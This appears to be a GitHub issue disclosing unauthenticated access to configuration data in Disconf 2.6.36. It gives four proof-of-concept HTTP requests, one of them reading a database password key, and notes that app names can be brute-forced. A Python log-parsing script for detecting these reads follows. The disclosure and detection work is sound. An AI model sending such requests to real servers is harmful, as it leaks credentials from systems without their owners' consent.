Improper permission management allowing unauthorized users to access sensitive configuration information #431

@gaogaostone

Description

The Disconf of version 2.6.36 has improper permission management, allowing unauthorized users to access sensitive configuration information stored in the configuration center.

Proof of Concept:

1) Access the /api/config/list without authentication to retrieve all the parameters and their values for a particular app in a particular env with a particular version.
Send the request as follows without a cookie or token, and it responds with the parameters and their values.
The request is sent with three parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version, and it can be guessed by naming convention.

GET /api/config/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html

2) Access the /api/config/simple/list without authentication to retrieve all the parameters for a particular app in a particular env with a particular version. This interface only returns the parameters, without values.
Send the request as follows without a cookie or token, and it responds with the parameters.
The request is sent with three parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version, and it can be guessed by naming convention.

GET /api/config/simple/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html

3) Access the /api/config/item without authentication to retrieve the values of a particular parameter for a particular app in a particular env with a particular version.
Send the request as follows without a cookie or token, and it responds with the values for a particular parameter.
The request is sent with four parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version, and it can be guessed by naming convention. The fourth parameter is the key of the parameter, and it can be guessed by naming convention.

GET /api/config/item?app=demo1&env=online&version=1.0&key=jdbc.db_0.password HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html

4) Access the /api/config/file without authentication to retrieve the content of a parameter file for a particular app in a particular env with a particular version.
Send the request as follows without a cookie or token, and it responds with the content of the parameter file.
The request is sent with four parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version, and it can be guessed by naming convention. The fourth parameter is the parameter file's name, and it can be guessed by naming convention.

GET /api/config/file?app=demo1&env=online&version=1.0&key=spring-cache.properties HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html

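The four read endpoints above leave a clear trail in the web server's access log. The following is an added detection example, not code from the report or from the Disconf project: it parses Common Log Format lines (constructed samples, assumed to come from a reverse proxy in front of Disconf) and flags successful reads of password-like keys, full dumps via /api/config/list, and one client cycling through many app names, which is the guessing behaviour the report describes.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# The four unauthenticated read endpoints named in the report.
CONFIG_ENDPOINTS = {"/api/config/list", "/api/config/simple/list",
                    "/api/config/item", "/api/config/file"}
SENSITIVE_KEY = re.compile(r"passw|secret|token|credential", re.I)
# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def parse_line(line):
    """Return (ip, method, path, params, status), or None if not a config-API hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    if url.path not in CONFIG_ENDPOINTS:
        return None
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    return ip, method, url.path, params, int(status)

def analyze(lines, enum_threshold=3):
    """Flag secret-looking key reads, full config dumps and per-IP app enumeration."""
    findings, apps_by_ip = [], defaultdict(set)
    for line in lines:
        hit = parse_line(line)
        if hit is None:
            continue
        ip, _, path, params, status = hit
        apps_by_ip[ip].add(params.get("app", ""))
        # /item and /file return values; a 200 for a password-like key is a leak.
        if status == 200 and path in ("/api/config/item", "/api/config/file") \
                and SENSITIVE_KEY.search(params.get("key", "")):
            findings.append({"ip": ip, "reason": "sensitive_key_read", "detail": params["key"]})
        # /list returns every key and value of the app in one response.
        if status == 200 and path == "/api/config/list":
            findings.append({"ip": ip, "reason": "full_config_dump", "detail": params.get("app", "")})
    for ip, apps in apps_by_ip.items():
        if len(apps) >= enum_threshold:  # one client trying many app names
            findings.append({"ip": ip, "reason": "app_enumeration", "detail": sorted(apps)})
    return findings

# Constructed sample lines; hosts, apps and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /api/config/list?app=demo1&env=online&version=1.0 HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /api/config/item?app=demo1&env=online&version=1.0&key=jdbc.db_0.password HTTP/1.1" 200 57',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /api/config/simple/list?app=demo2&env=rd&version=1.0 HTTP/1.1" 200 120',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /api/config/file?app=demo3&env=qa&version=1.0&key=spring-cache.properties HTTP/1.1" 200 300',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /main.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Once the endpoints are put behind authentication, the same script still serves as a regression check: a 401/403 status on these paths produces no findings.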
